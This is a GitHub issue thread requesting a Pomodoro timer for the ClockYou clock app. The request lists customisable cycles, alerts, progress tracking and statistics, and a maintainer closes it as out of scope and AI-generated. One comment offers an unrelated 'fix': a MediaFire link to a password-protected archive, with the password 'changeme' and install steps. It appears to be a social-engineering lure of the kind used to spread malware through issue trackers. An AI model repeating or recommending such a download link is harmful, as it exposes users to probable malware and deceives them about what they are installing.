### ISSUE TITLE
Pomodoro Timer

### ISSUE THREAD

**Issue by Creeperman3000** [you-apps/ClockYou#363]
**Feature Name**: Pomodoro Timer
**Summary**: Add a Pomodoro timer to the clock app to help users improve productivity through focused work sessions and structured breaks.
**Description**:  
The Pomodoro Technique is a popular time management method that involves working for a set period (typically 25 minutes) followed by a short break (5 minutes). After four work sessions, a longer break is taken (15-30 minutes). This technique helps users maintain focus and productivity by breaking tasks into manageable intervals.

### Other details

**Key Features**:
1. **Customisable Pomodoro Cycles**: Allow users to customise the length of work sessions, short breaks, and long breaks according to their preferences (e.g., 25/5/15 minutes as default).
   
2. **Audio Alerts and Notifications**: Provide alerts at the start and end of each session and break, with options for custom sounds or vibrations.

3. **Progress Tracking**: Display progress through each session and total cycles completed for the day, motivating users to keep going.

4. **Statistics and History**: Track completed Pomodoro sessions over time, helping users monitor their productivity.

5. **Pause and Skip Options**: Offer the ability to pause, skip, or adjust the current session without disrupting the overall cycle.

6. **Dark Mode and Minimalistic Design**: Ensure the Pomodoro timer integrates seamlessly with the app's UI, featuring a clean, distraction-free design with dark mode support.

7. **Session Labelling**: Allow users to label each Pomodoro session to keep track of tasks (e.g., "Writing Report" or "Studying").

8. **Integration with Existing Features**: Sync the Pomodoro timer with other clock app features, like alarms and reminders, for a cohesive user experience.

**Benefits**:
- Increases productivity and focus by encouraging users to work in structured intervals.
- Provides users with clear boundaries between work and rest, reducing burnout.
- Offers a built-in tool that eliminates the need for external productivity apps, making the clock app more valuable.

**Target Users**: This feature will appeal to students, professionals, and anyone looking to manage their time better and stay focused on tasks.

### Acknowledgements

- [X] I have searched the existing issues and this is a new ticket, **NOT** a duplicate or related to another open issue.
- [X] I have written a short but informative title.
- [X] I will fill out all of the requested information in this form.

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Bnyro** [comment]
Out of scope, AI generated issue.
